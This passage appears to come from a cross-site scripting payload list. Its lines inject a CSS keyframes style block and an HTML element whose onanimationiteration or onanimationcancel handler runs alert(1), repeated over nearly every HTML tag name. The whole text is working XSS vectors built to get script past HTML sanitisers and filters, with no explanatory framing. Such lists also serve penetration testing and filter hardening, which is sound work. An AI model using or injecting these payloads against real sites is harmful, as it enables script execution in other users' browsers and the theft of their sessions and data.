style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></dir> +<style>@keyframes slidein {}</style><div style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></div> +<style>@keyframes slidein {}</style><dl style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></dl> +<style>@keyframes slidein {}</style><dt style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></dt> +<style>@keyframes slidein {}</style><element style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></element> +<style>@keyframes slidein {}</style><em style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></em> +<style>@keyframes slidein {}</style><embed style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></embed> +<style>@keyframes slidein {}</style><fieldset style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></fieldset> +<style>@keyframes slidein {}</style><figcaption style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></figcaption> +<style>@keyframes slidein {}</style><figure style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></figure> +<style>@keyframes slidein {}</style><font style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></font> +<style>@keyframes slidein {}</style><footer style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></footer> +<style>@keyframes slidein {}</style><form style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></form> +<style>@keyframes slidein {}</style><frame style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></frame> +<style>@keyframes slidein {}</style><frameset style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></frameset> +<style>@keyframes slidein {}</style><h1 style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></h1> +<style>@keyframes slidein {}</style><head style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></head> +<style>@keyframes slidein {}</style><header style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></header> +<style>@keyframes slidein {}</style><hgroup style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></hgroup> +<style>@keyframes slidein {}</style><hr style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></hr> +<style>@keyframes slidein {}</style><html style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></html> +<style>@keyframes slidein {}</style><i style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></i> +<style>@keyframes slidein {}</style><iframe style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></iframe> +<style>@keyframes slidein {}</style><image style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></image> +<style>@keyframes slidein {}</style><img style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></img> +<style>@keyframes slidein {}</style><input style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></input> +<style>@keyframes slidein {}</style><ins style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></ins> +<style>@keyframes slidein {}</style><isindex style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></isindex> +<style>@keyframes slidein {}</style><kbd style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></kbd> +<style>@keyframes slidein {}</style><keygen style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></keygen> +<style>@keyframes slidein {}</style><label style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></label> +<style>@keyframes slidein {}</style><legend style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></legend> +<style>@keyframes slidein {}</style><li style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></li> +<style>@keyframes slidein {}</style><link style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></link> +<style>@keyframes slidein {}</style><listing style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></listing> +<style>@keyframes slidein {}</style><main style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></main> +<style>@keyframes slidein {}</style><map style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></map> +<style>@keyframes slidein {}</style><mark style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></mark> +<style>@keyframes slidein {}</style><marquee style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></marquee> +<style>@keyframes slidein {}</style><menu style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></menu> +<style>@keyframes slidein {}</style><menuitem style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></menuitem> +<style>@keyframes slidein {}</style><meta style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></meta> +<style>@keyframes slidein {}</style><meter style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></meter> +<style>@keyframes slidein {}</style><multicol style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></multicol> +<style>@keyframes slidein {}</style><nav style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></nav> +<style>@keyframes slidein {}</style><nextid style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></nextid> +<style>@keyframes slidein {}</style><nobr style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></nobr> +<style>@keyframes slidein {}</style><noembed style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></noembed> +<style>@keyframes slidein {}</style><noframes style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></noframes> +<style>@keyframes slidein {}</style><noscript style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></noscript> +<style>@keyframes slidein {}</style><object style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></object> +<style>@keyframes slidein {}</style><ol style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></ol> +<style>@keyframes slidein {}</style><optgroup style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></optgroup> +<style>@keyframes slidein {}</style><option style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></option> +<style>@keyframes slidein {}</style><output style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></output> +<style>@keyframes slidein {}</style><p style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></p> +<style>@keyframes slidein {}</style><param style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></param> +<style>@keyframes slidein {}</style><picture style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></picture> +<style>@keyframes slidein {}</style><plaintext style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></plaintext> +<style>@keyframes slidein {}</style><pre style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></pre> +<style>@keyframes slidein {}</style><progress style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></progress> +<style>@keyframes slidein {}</style><q style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></q> +<style>@keyframes slidein {}</style><rb style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></rb> +<style>@keyframes slidein {}</style><rp style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></rp> +<style>@keyframes slidein {}</style><rt style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></rt> +<style>@keyframes slidein {}</style><rtc style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></rtc> +<style>@keyframes slidein {}</style><ruby style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></ruby> +<style>@keyframes slidein {}</style><s style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></s> +<style>@keyframes slidein {}</style><samp style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></samp> +<style>@keyframes slidein {}</style><script style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></script> +<style>@keyframes slidein {}</style><section style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></section> +<style>@keyframes slidein {}</style><select style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></select> +<style>@keyframes slidein {}</style><shadow style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></shadow> +<style>@keyframes slidein {}</style><slot style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></slot> +<style>@keyframes slidein {}</style><small style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></small> +<style>@keyframes slidein {}</style><source style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></source> +<style>@keyframes slidein {}</style><spacer style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></spacer> +<style>@keyframes slidein {}</style><span style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></span> +<style>@keyframes slidein {}</style><strike style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></strike> +<style>@keyframes slidein {}</style><strong style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></strong> +<style>@keyframes slidein {}</style><style style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></style> +<style>@keyframes slidein {}</style><sub style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></sub> +<style>@keyframes slidein {}</style><summary style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></summary> +<style>@keyframes slidein {}</style><sup style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></sup> +<style>@keyframes slidein {}</style><svg style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></svg> +<style>@keyframes slidein {}</style><table style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></table> +<style>@keyframes slidein {}</style><tbody style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></tbody> +<style>@keyframes slidein {}</style><td style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></td> +<style>@keyframes slidein {}</style><template style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></template> +<style>@keyframes slidein {}</style><textarea style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></textarea> +<style>@keyframes slidein {}</style><tfoot style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></tfoot> +<style>@keyframes slidein {}</style><th style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></th> +<style>@keyframes slidein {}</style><thead style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></thead> +<style>@keyframes slidein {}</style><time style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></time> +<style>@keyframes slidein {}</style><title style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></title> +<style>@keyframes slidein {}</style><tr style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></tr> +<style>@keyframes slidein {}</style><track style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></track> +<style>@keyframes slidein {}</style><tt style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></tt> +<style>@keyframes slidein {}</style><u style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></u> +<style>@keyframes slidein {}</style><ul style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></ul> +<style>@keyframes slidein {}</style><var style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></var> +<style>@keyframes slidein {}</style><video style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></video> +<style>@keyframes slidein {}</style><wbr style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></wbr> +<style>@keyframes slidein {}</style><xmp style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></xmp> +<style>@keyframes slidein {}</style><xss style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></xss> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><a id=x style="position:absolute;" onanimationcancel="alert(1)"></a> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><abbr id=x style="position:absolute;" onanimationcancel="alert(1)"></abbr> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><acronym id=x style="position:absolute;" onanimationcancel="alert(1)"></acronym> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><address id=x style="position:absolute;" onanimationcancel="alert(1)"></address> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><applet id=x style="position:absolute;" onanimationcancel="alert(1)"></applet> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><area id=x style="position:absolute;" onanimationcancel="alert(1)"></area> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><article id=x style="position:absolute;" onanimationcancel="alert(1)"></article> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><aside id=x style="position:absolute;" onanimationcancel="alert(1)"></aside> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><audio id=x style="position:absolute;" onanimationcancel="alert(1)"></audio> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><b id=x style="position:absolute;" onanimationcancel="alert(1)"></b> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><base id=x style="position:absolute;" onanimationcancel="alert(1)"></base> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><basefont id=x style="position:absolute;" onanimationcancel="alert(1)"></basefont> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><bdi id=x style="position:absolute;" onanimationcancel="alert(1)"></bdi> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><bdo id=x style="position:absolute;" onanimationcancel="alert(1)"></bdo> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><bgsound id=x style="position:absolute;" onanimationcancel="alert(1)"></bgsound> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><big id=x style="position:absolute;" onanimationcancel="alert(1)"></big> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><blink id=x style="position:absolute;" onanimationcancel="alert(1)"></blink> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><blockquote id=x style="position:absolute;" onanimationcancel="alert(1)"></blockquote> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><body id=x style="position:absolute;" onanimationcancel="alert(1)"></body> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><br id=x style="position:absolute;" onanimationcancel="alert(1)"></br> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><button id=x style="position:absolute;" onanimationcancel="alert(1)"></button> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><canvas id=x style="position:absolute;" onanimationcancel="alert(1)"></canvas> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><caption id=x style="position:absolute;" onanimationcancel="alert(1)"></caption> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><center id=x style="position:absolute;" onanimationcancel="alert(1)"></center> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><cite id=x style="position:absolute;" onanimationcancel="alert(1)"></cite> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><code id=x style="position:absolute;" onanimationcancel="alert(1)"></code> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><col id=x style="position:absolute;" onanimationcancel="alert(1)"></col> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><colgroup id=x style="position:absolute;" onanimationcancel="alert(1)"></colgroup> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><command id=x style="position:absolute;" onanimationcancel="alert(1)"></command> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><content id=x style="position:absolute;" onanimationcancel="alert(1)"></content> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><data id=x style="position:absolute;" onanimationcancel="alert(1)"></data> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><datalist id=x style="position:absolute;" onanimationcancel="alert(1)"></datalist> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><dd id=x style="position:absolute;" onanimationcancel="alert(1)"></dd> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><del id=x style="position:absolute;" onanimationcancel="alert(1)"></del> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><details id=x style="position:absolute;" onanimationcancel="alert(1)"></details> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><dfn id=x style="position:absolute;" onanimationcancel="alert(1)"></dfn> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><dialog id=x style="position:absolute;" onanimationcancel="alert(1)"></dialog> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><dir id=x style="position:absolute;" onanimationcancel="alert(1)"></dir> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><div id=x style="position:absolute;" onanimationcancel="alert(1)"></div> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><dl id=x style="position:absolute;" onanimationcancel="alert(1)"></dl> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><dt id=x style="position:absolute;" onanimationcancel="alert(1)"></dt> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><element id=x style="position:absolute;" onanimationcancel="alert(1)"></element> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><em id=x style="position:absolute;" onanimationcancel="alert(1)"></em> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><embed id=x style="position:absolute;" onanimationcancel="alert(1)"></embed> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><fieldset id=x style="position:absolute;" onanimationcancel="alert(1)"></fieldset> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><figcaption id=x style="position:absolute;" onanimationcancel="alert(1)"></figcaption> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><figure id=x style="position:absolute;" onanimationcancel="alert(1)"></figure> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><font id=x style="position:absolute;" onanimationcancel="alert(1)"></font> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><footer id=x style="position:absolute;" onanimationcancel="alert(1)"></footer> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><form id=x style="position:absolute;" onanimationcancel="alert(1)"></form> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><frame id=x style="position:absolute;" onanimationcancel="alert(1)"></frame> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><frameset id=x style="position:absolute;" onanimationcancel="alert(1)"></frameset> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><h1 id=x style="position:absolute;" onanimationcancel="alert(1)"></h1> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><head id=x style="position:absolute;" onanimationcancel="alert(1)"></head> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><header id=x style="position:absolute;" onanimationcancel="alert(1)"></header> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><hgroup id=x style="position:absolute;" onanimationcancel="alert(1)"></hgroup> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><hr id=x style="position:absolute;" onanimationcancel="alert(1)"></hr> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><html id=x style="position:absolute;" onanimationcancel="alert(1)"></html> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><i id=x style="position:absolute;" onanimationcancel="alert(1)"></i> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><iframe id=x style="position:absolute;" onanimationcancel="alert(1)"></iframe> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><image id=x style="position:absolute;" onanimationcancel="alert(1)"></image> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><img id=x style="position:absolute;" onanimationcancel="alert(1)"></img> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><input id=x style="position:absolute;" onanimationcancel="alert(1)"></input> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><ins id=x style="position:absolute;" onanimationcancel="alert(1)"></ins> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><isindex id=x style="position:absolute;" onanimationcancel="alert(1)"></isindex> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><kbd id=x style="position:absolute;" onanimationcancel="alert(1)"></kbd> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><keygen id=x style="position:absolute;" onanimationcancel="alert(1)"></keygen> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><label id=x style="position:absolute;" onanimationcancel="alert(1)"></label> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><legend id=x style="position:absolute;" onanimationcancel="alert(1)"></legend> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><li id=x style="position:absolute;" onanimationcancel="alert(1)"></li> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><link id=x style="position:absolute;" onanimationcancel="alert(1)"></link> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><listing id=x style="position:absolute;" onanimationcancel="alert(1)"></listing> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><main id=x style="position:absolute;" onanimationcancel="alert(1)"></main> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><map id=x style="position:absolute;" onanimationcancel="alert(1)"></map> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><mark id=x style="position:absolute;" onanimationcancel="alert(1)"></mark> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><marquee id=x style="position:absolute;" onanimationcancel="alert(1)"></marquee> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><menu id=x style="position:absolute;" onanimationcancel="alert(1)"></menu> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><menuitem id=x style="position:absolute;" onanimationcancel="alert(1)"></menuitem> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><meta id=x style="position:absolute;" onanimationcancel="alert(1)"></meta> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><meter id=x style="position:absolute;" onanimationcancel="alert(1)"></meter> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><multicol id=x style="position:absolute;" onanimationcancel="alert(1)"></multicol> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><nav id=x style="position:absolute;" onanimationcancel="alert(1)"></nav> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><nextid id=x style="position:absolute;" onanimationcancel="alert(1)"></nextid> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><nobr id=x style="position:absolute;" onanimationcancel="alert(1)"></nobr> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><noembed id=x style="position:absolute;" onanimationcancel="alert(1)"></noembed> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><noframes id=x style="position:absolute;" onanimationcancel="alert(1)"></noframes> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><noscript id=x style="position:absolute;" onanimationcancel="alert(1)"></noscript> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><object id=x style="position:absolute;" onanimationcancel="alert(1)"></object> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><ol id=x style="position:absolute;" onanimationcancel="alert(1)"></ol> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><optgroup id=x style="position:absolute;" onanimationcancel="alert(1)"></optgroup> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><option 